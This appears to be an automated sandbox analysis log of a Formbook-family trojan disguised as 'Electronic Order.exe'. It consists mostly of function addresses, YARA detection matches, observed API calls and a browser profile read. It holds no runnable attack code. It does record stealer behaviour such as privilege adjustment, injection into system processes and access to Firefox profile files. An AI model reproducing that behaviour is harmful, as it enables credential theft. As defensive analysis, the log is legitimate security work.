            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C4E2_2_00401C4E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C502_2_00401C50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC7A2_2_0040FC7A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC832_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004045942_2_00404594
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026262_2_00402626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026302_2_00402630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FEA32_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF232_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA3522_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036003E62_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F02_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E02742_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C02C02_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C81582_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA1182_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035301002_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F81CC2_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036001AA2_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F41A22_2_035F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D20002_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035647502_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035407702_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C02_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C6E02_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035405352_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036005912_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F24462_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E44202_2_035E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EE4F62_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB402_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F6BD72_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA802_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035569622_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360A9A62_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A02_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354A8402_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035428402_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E8F02_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035268B82_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F402_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560F302_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E2F302_2_035E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03582F282_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC82_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354CFE02_2_0354CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BEFA02_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540E592_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEE262_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEEDB2_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552E902_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FCE932_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DCD1F2_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354AD002_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353ADE02_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03558DBF2_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540C002_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530CF22_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0CB52_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352D34C2_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F132D2_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0358739A2_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B2C02_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E12ED2_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035452A02_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360B16B2_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352F1722_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357516C2_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354B1B02_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EF0CC2_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035470C02_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F70E92_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF0E02_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF7B02_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035856302_2_03585630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F16CC2_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F75712_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036095C32_2_036095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DD5B02_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035314602_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF43F2_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFB762_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B5BF02_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357DBF92_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FB802_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFA492_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7A462_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B3A6C2_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EDAC62_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DDAAC2_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03585AA02_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E1AA32_2_035E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035499502_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B9502_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D59102_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AD8002_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035438E02_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFF092_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03503FD22_2_03503FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03503FD52_2_03503FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03541F922_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFFB12_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03549EB02_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F1D5A2_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03543D402_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7D732_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FDC02_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B9C322_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFCF22_2_035FFCF2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324A3527_2_0324A352
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032503E67_2_032503E6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0319E3F07_2_0319E3F0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032302747_2_03230274
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032102C07_2_032102C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031801007_2_03180100
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0322A1187_2_0322A118
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032181587_2_03218158
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032441A27_2_032441A2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032501AA7_2_032501AA
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032481CC7_2_032481CC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032220007_2_03222000
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031B47507_2_031B4750
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031907707_2_03190770
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0318C7C07_2_0318C7C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031AC6E07_2_031AC6E0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031905357_2_03190535
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032505917_2_03250591
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032344207_2_03234420
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032424467_2_03242446
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0323E4F67_2_0323E4F6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324AB407_2_0324AB40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03246BD77_2_03246BD7
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0318EA807_2_0318EA80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031A69627_2_031A6962
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0325A9A67_2_0325A9A6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031929A07_2_031929A0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0319A8407_2_0319A840
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031928407_2_03192840
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031768B87_2_031768B8
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031BE8F07_2_031BE8F0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03232F307_2_03232F30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031B0F307_2_031B0F30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031D2F287_2_031D2F28
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03204F407_2_03204F40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0320EFA07_2_0320EFA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03182FC87_2_03182FC8
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0319CFE07_2_0319CFE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324EE267_2_0324EE26
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03190E597_2_03190E59
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031A2E907_2_031A2E90
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324CE937_2_0324CE93
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324EEDB7_2_0324EEDB
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0319AD007_2_0319AD00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0322CD1F7_2_0322CD1F
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031A8DBF7_2_031A8DBF
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0318ADE07_2_0318ADE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03190C007_2_03190C00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03230CB57_2_03230CB5
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03180CF27_2_03180CF2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324132D7_2_0324132D
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0317D34C7_2_0317D34C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031D739A7_2_031D739A
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031952A07_2_031952A0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032312ED7_2_032312ED
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031AB2C07_2_031AB2C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0325B16B7_2_0325B16B
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0317F1727_2_0317F172
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C516C7_2_031C516C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0319B1B07_2_0319B1B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324F0E07_2_0324F0E0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032470E97_2_032470E9
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031970C07_2_031970C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0323F0CC7_2_0323F0CC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324F7B07_2_0324F7B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031D56307_2_031D5630
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032416CC7_2_032416CC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032475717_2_03247571
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0322D5B07_2_0322D5B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032595C37_2_032595C3
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324F43F7_2_0324F43F
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031814607_2_03181460
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324FB767_2_0324FB76
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031AFB807_2_031AFB80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03205BF07_2_03205BF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031CDBF97_2_031CDBF9
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03203A6C7_2_03203A6C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03247A467_2_03247A46
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324FA497_2_0324FA49
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03231AA37_2_03231AA3
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0322DAAC7_2_0322DAAC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031D5AA07_2_031D5AA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0323DAC67_2_0323DAC6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_032259107_2_03225910
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031999507_2_03199950
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031AB9507_2_031AB950
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031FD8007_2_031FD800
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031938E07_2_031938E0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324FF097_2_0324FF09
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03191F927_2_03191F92
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324FFB17_2_0324FFB1
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03153FD57_2_03153FD5
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03153FD27_2_03153FD2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03199EB07_2_03199EB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03247D737_2_03247D73
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03193D407_2_03193D40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03241D5A7_2_03241D5A
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031AFDC07_2_031AFDC0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_03209C327_2_03209C32
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0324FCF27_2_0324FCF2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007418E07_2_007418E0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0073C8907_2_0073C890
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0073C8877_2_0073C887
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0073CAB07_2_0073CAB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0073AB307_2_0073AB30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0075AFA07_2_0075AFA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007311A17_2_007311A1
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007435707_2_00743570
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_0074356C7_2_0074356C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_02FAE4747_2_02FAE474
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_02FAE5987_2_02FAE598
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_02FAD9987_2_02FAD998
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_02FAE92C7_2_02FAE92C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_02FB3E097_2_02FB3E09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 031D7E54 appears 111 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 031C5130 appears 58 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 031FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0317B970 appears 280 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0320F290 appears 105 times
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: String function: 00DE0D27 appears 70 times
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: String function: 00DE8B40 appears 42 times
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: String function: 00DC7F41 appears 35 times
            Source: Electronic Order.exe, 00000000.00000003.2117454630.0000000003F8D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Electronic Order.exe
            Source: Electronic Order.exe, 00000000.00000003.2118237306.0000000003DE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Electronic Order.exe
            Source: Electronic Order.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@13/8
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2A2D5 GetLastError,FormatMessageW,0_2_00E2A2D5
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E18713 AdjustTokenPrivileges,CloseHandle,0_2_00E18713
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E18CC3
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E2B59E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E3F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00E3F121
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E386D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00E386D0
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00DC4FE9
            Source: C:\Users\user\Desktop\Electronic Order.exeFile created: C:\Users\user\AppData\Local\Temp\aut4F00.tmpJump to behavior
            Source: Electronic Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
